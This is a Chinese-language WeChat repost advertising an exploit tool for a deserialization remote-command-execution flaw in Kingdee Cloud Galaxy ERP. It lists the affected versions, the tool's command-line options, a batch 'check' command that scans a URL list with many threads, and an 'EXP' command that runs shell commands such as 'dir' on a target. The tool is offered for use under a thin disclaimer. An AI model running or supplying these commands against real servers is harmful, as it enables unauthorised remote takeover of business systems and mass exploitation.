免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测。
项目介绍
什么是金蝶云星空 Kingdee-erp-Unserialize-RCE?
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
影响范围:
-
6.x版本:低于6.2.1012.4 -
7.x版本:7.0.352.16 至 7.7.0.202111 -
8.x版本:8.0.0.202205 至 8.1.0.20221110
使用方法
基本用法:
usage: Kingdee-erp-Unserialize-RCE.py [-h] [-u URL] [--check] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT][-p PROXY] [--cmd CMD]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target url(e.g. http://127.0.0.1)
--check Check if vulnerable
-f FILE, --file FILE Target file(e.g. url.txt)
-t THREAD, --thread THREAD
Number of thread (default 5)
-T TIMEOUT, --timeout TIMEOUT
Request timeout (default 3)
-o OUTPUT, --output OUTPUT
Vuln url output file (e.g. result.txt)
-p PROXY, --proxy PROXY
Request Proxy (e.g http://127.0.0.1:8080)
--cmd CMD execute cmd (e.g. whoami)```
Poc:
python .Kingdee-erp-Unserialize-RCE.py -f .url.txt --check -t 10
Exp:
python .Kingdee-erp-Unserialize-RCE.py -u http://host --cmd 'dir'
原文始发于微信公众号(信安404):【POC&EXP】金蝶云星空 Kingdee-erp-Unserialize-RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论